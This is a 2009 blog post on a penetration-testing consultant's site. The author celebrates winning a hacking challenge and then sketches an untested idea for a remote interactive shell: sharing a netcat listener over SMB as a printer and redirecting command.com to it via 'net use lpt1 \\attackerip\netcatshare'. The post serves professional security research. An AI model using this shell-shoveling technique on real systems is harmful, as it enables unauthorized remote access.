Welcome to In Depth Defense. In Depth Defense LLC is a privately owned Information Security Consulting company owned and operated by Mark Baggett. In Depth Defense specializes in Penetration Testing and Incident Response. At this time In Depth Defense is not accepting any new client work, but we are happy to speak to you and point you to other resources in the community.

Mark Baggett has been active in Information Security for 18+ years. I've served in a variety of roles from software developer to CISO. You can find archives of older blog entries below and read my newer posts on http://www.pauldotcom.com, http://isc.sans.edu and http://pen-testing.sans.org








Wednesday, January 21, 2009

Today is a good day!

First I learned via Wesley McGrew's website that I won Ed Skoudis' December hacking challenge.  When I look at the list of people who submitted answers, I feel really good to be included in that list of "notable security studs".    Thanks to Ed for putting together a fun challenge.  I always learn a lot any time I do anything related to Jedi Master Skoudo.


THEN I see this entry on Wesley's blog on pretending to be a printer with netcat.  It occurs to me that this is the other end of my netcat w/o netcat shell shoveling attempts I blogged about back April 08.   Using that technique I was able to shovel command output to netcat running on an arbitrary port.  But I really want a bidirectional interactive shell.   The thought is this.   

1) Share a netcat listener on my linux box over SMB.   
2) That netcat printer share must be a BIDIRECTIONAL printer and not be spooled
3) Net use lpt1 \\attackerip\netcatshare
4) command.com lpt1

command.com (The 16 bit predecessor to CMD.EXE) allows you to redirect I/O to a device.   Seems like it should work.    This should be fun. 

No comments:

Subscribe